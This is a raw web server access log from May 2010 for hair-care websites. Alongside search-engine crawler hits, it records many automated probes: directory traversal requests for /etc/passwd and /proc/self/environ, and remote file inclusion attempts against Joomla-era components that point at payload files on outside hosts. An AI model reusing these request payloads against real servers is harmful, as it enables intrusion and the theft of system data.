209.59.147.177 - - [03/May/2010:12:26:46 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:12:29:09 -0700] "GET /logs/access_100426.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:12:29:09 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:12:29:09 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:12:29:12 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:12:29:12 -0700] "GET /logs/access_100426.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:12:29:12 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:12:29:23 -0700] "GET /logs/access.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:12:29:25 -0700] "GET /logs/access.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.241.251.224 - - [03/May/2010:12:30:39 -0700] "GET /logs/access.log/index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
212.241.251.224 - - [03/May/2010:12:30:40 -0700] "GET /index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
212.241.251.224 - - [03/May/2010:12:30:40 -0700] "GET /logs/index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
204.236.244.14 - - [03/May/2010:12:33:17 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
204.236.244.14 - - [03/May/2010:12:33:19 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17665 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:12:35:08 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13990 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
212.39.12.10 - - [03/May/2010:12:37:52 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
212.39.12.10 - - [03/May/2010:12:37:53 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
193.47.80.39 - - [03/May/2010:12:39:04 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13441 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "freehairsecrets.com"
220.80.108.70 - - [03/May/2010:12:40:03 -0700] "GET /logs/access_100125.log//?_zb_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:12:40:03 -0700] "GET /?_zb_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:12:40:06 -0700] "GET /logs//?_zb_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 200 5090 "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.114.238 - - [03/May/2010:12:42:22 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
67.195.114.238 - - [03/May/2010:12:42:23 -0700] "GET /logs/access.log HTTP/1.0" 200 403551 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
212.39.12.10 - - [03/May/2010:12:46:03 -0700] "GET /logs/access.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
212.39.12.10 - - [03/May/2010:12:46:04 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
212.39.12.10 - - [03/May/2010:12:46:04 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
212.39.12.10 - - [03/May/2010:12:46:04 -0700] "GET /logs/access.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
212.39.12.10 - - [03/May/2010:12:46:05 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
212.39.12.10 - - [03/May/2010:12:46:05 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
81.23.196.90 - - [03/May/2010:12:53:14 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)" "growlonghairfast.com"
60.217.248.151 - - [03/May/2010:12:53:16 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)" "growlonghairfast.com"
125.64.96.21 - - [03/May/2010:12:53:18 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)" "growlonghairfast.com"
91.121.77.13 - - [03/May/2010:12:54:08 -0700] "GET /index.php?option=com_fabrik&controller=' HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
207.45.178.42 - - [03/May/2010:12:54:31 -0700] "GET /index.php?option=com_fabrik&controller=' HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
207.45.178.42 - - [03/May/2010:12:55:06 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
119.235.237.86 - - [03/May/2010:12:55:12 -0700] "GET /freehairsecretsphp/viewtopic.php?p=11099 HTTP/1.1" 500 - "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "freehairsecrets.com"
91.121.77.13 - - [03/May/2010:12:55:18 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
205.234.252.102 - - [03/May/2010:12:59:37 -0700] "GET /logs/access_100426.log%20%20/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.234.252.102 - - [03/May/2010:12:59:37 -0700] "GET /logs/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.234.252.102 - - [03/May/2010:12:59:37 -0700] "GET /errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.234.252.102 - - [03/May/2010:12:59:39 -0700] "GET /logs/access_100426.log%20%20/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.234.252.102 - - [03/May/2010:12:59:39 -0700] "GET /logs/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.234.252.102 - - [03/May/2010:12:59:39 -0700] "GET /errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.234.252.102 - - [03/May/2010:12:59:42 -0700] "GET /logs/access.log%20%20/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.234.252.102 - - [03/May/2010:12:59:46 -0700] "GET /logs/access.log%20%20/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:13:00:27 -0700] "GET /logs/access_091228.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
119.235.237.16 - - [03/May/2010:13:02:21 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16913 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "growlonghairfast.com"
91.121.77.13 - - [03/May/2010:13:03:23 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=' HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.77.13 - - [03/May/2010:13:03:23 -0700] "GET /index.php?option=com_fabrik&controller=' HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.77.13 - - [03/May/2010:13:03:23 -0700] "GET /logs//index.php?option=com_fabrik&controller=' HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
67.195.114.238 - - [03/May/2010:13:03:54 -0700] "GET /logs/access_091026.log HTTP/1.0" 200 562644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
207.45.178.42 - - [03/May/2010:13:04:41 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=' HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
207.45.178.42 - - [03/May/2010:13:04:41 -0700] "GET /index.php?option=com_fabrik&controller=' HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
207.45.178.42 - - [03/May/2010:13:04:41 -0700] "GET /logs//index.php?option=com_fabrik&controller=' HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
91.121.77.13 - - [03/May/2010:13:05:54 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.77.13 - - [03/May/2010:13:05:54 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.77.13 - - [03/May/2010:13:05:55 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:13:07:26 -0700] "GET /logs/access_100125.log//?_zb_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:13:07:26 -0700] "GET /logs//?_zb_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 200 5090 "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:13:07:26 -0700] "GET /?_zb_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:13:07:29 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:13:07:33 -0700] "GET /logs/access.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:13:07:33 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:13:07:34 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:13:07:38 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:13:07:38 -0700] "GET /logs/access.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.234.252.102 - - [03/May/2010:13:07:49 -0700] "GET /logs/access_100426.log/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.234.252.102 - - [03/May/2010:13:07:50 -0700] "GET /logs/access.log/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.178.42 - - [03/May/2010:13:10:18 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
207.45.178.42 - - [03/May/2010:13:10:18 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
207.45.178.42 - - [03/May/2010:13:10:18 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
205.234.252.102 - - [03/May/2010:13:10:24 -0700] "GET /logs/access.log/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.234.252.102 - - [03/May/2010:13:10:29 -0700] "GET /logs/access_100426.log/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:13:11:21 -0700] "GET /?_zb_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:13:11:23 -0700] "GET /logs/access_100125.log//?_zb_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:13:11:23 -0700] "GET /logs//?_zb_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 200 5090 "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:13:16:59 -0700] "GET /logs/access.log//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:13:16:59 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:13:16:59 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:13:16:59 -0700] "GET /logs/access.log//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:13:16:59 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [03/May/2010:13:16:59 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.172.232.251 - - [03/May/2010:13:20:58 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.172.232.251 - - [03/May/2010:13:20:58 -0700] "GET /logs/access_100426.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.172.232.251 - - [03/May/2010:13:20:58 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
80.97.64.32 - - [03/May/2010:13:21:43 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://58.145.171.196/////appserv/.vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.97.64.32 - - [03/May/2010:13:21:44 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://58.145.171.196/////appserv/.vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.97.64.32 - - [03/May/2010:13:21:44 -0700] "GET /logs/access.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://58.145.171.196/////appserv/.vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.58.240.155 - - [03/May/2010:13:23:57 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "growlonghairfast.com"
195.58.240.155 - - [03/May/2010:13:24:00 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "growlonghairfast.com"
195.58.240.155 - - [03/May/2010:13:24:02 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "growlonghairfast.com"
80.97.64.32 - - [03/May/2010:13:24:11 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://58.145.171.196/////appserv/.vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.97.64.32 - - [03/May/2010:13:24:11 -0700] "GET /logs/access.log//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://58.145.171.196/////appserv/.vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.97.64.32 - - [03/May/2010:13:24:11 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://58.145.171.196/////appserv/.vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:13:24:22 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
184.73.125.29 - - [03/May/2010:13:24:53 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "SheenBot/SheenBot-1.0.4 (Sheen web crawler)" "www.growlonghairfast.com"
184.73.125.29 - - [03/May/2010:13:24:53 -0700] "GET /tmp/ HTTP/1.0" 200 643 "-" "SheenBot/SheenBot-1.0.4 (Sheen web crawler)" "www.growlonghairfast.com"
184.73.125.29 - - [03/May/2010:13:25:03 -0700] "GET /logs/ HTTP/1.0" 200 5069 "-" "SheenBot/SheenBot-1.0.4 (Sheen web crawler)" "www.growlonghairfast.com"
184.73.125.29 - - [03/May/2010:13:25:19 -0700] "GET /freehairsecretsphp/ HTTP/1.0" 200 333 "-" "SheenBot/SheenBot-1.0.4 (Sheen web crawler)" "www.growlonghairfast.com"
151.1.253.1 - - [03/May/2010:13:25:56 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
151.1.253.1 - - [03/May/2010:13:25:56 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
151.1.253.1 - - [03/May/2010:13:25:58 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
151.1.253.1 - - [03/May/2010:13:25:58 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
151.1.253.1 - - [03/May/2010:13:25:58 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
151.1.253.1 - - [03/May/2010:13:25:59 -0700] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
124.217.229.185 - - [03/May/2010:13:28:08 -0700] "GET /logs/access_100426.log%20%20/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.217.229.185 - - [03/May/2010:13:28:08 -0700] "GET /logs/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.217.229.185 - - [03/May/2010:13:28:08 -0700] "GET /errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.217.229.185 - - [03/May/2010:13:28:15 -0700] "GET /logs/access.log%20%20/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [03/May/2010:13:28:30 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [03/May/2010:13:28:30 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [03/May/2010:13:28:30 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [03/May/2010:13:28:31 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [03/May/2010:13:28:31 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [03/May/2010:13:28:31 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.217.229.185 - - [03/May/2010:13:29:44 -0700] "GET /logs/access_100426.log%20%20/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.217.229.185 - - [03/May/2010:13:29:44 -0700] "GET /logs/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.217.229.185 - - [03/May/2010:13:29:45 -0700] "GET /errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.217.229.185 - - [03/May/2010:13:29:51 -0700] "GET /logs/access.log%20%20/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.217.229.185 - - [03/May/2010:13:30:15 -0700] "GET /errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.217.229.185 - - [03/May/2010:13:30:15 -0700] "GET /logs/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.217.229.185 - - [03/May/2010:13:30:15 -0700] "GET /logs/access_100426.log%20%20/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
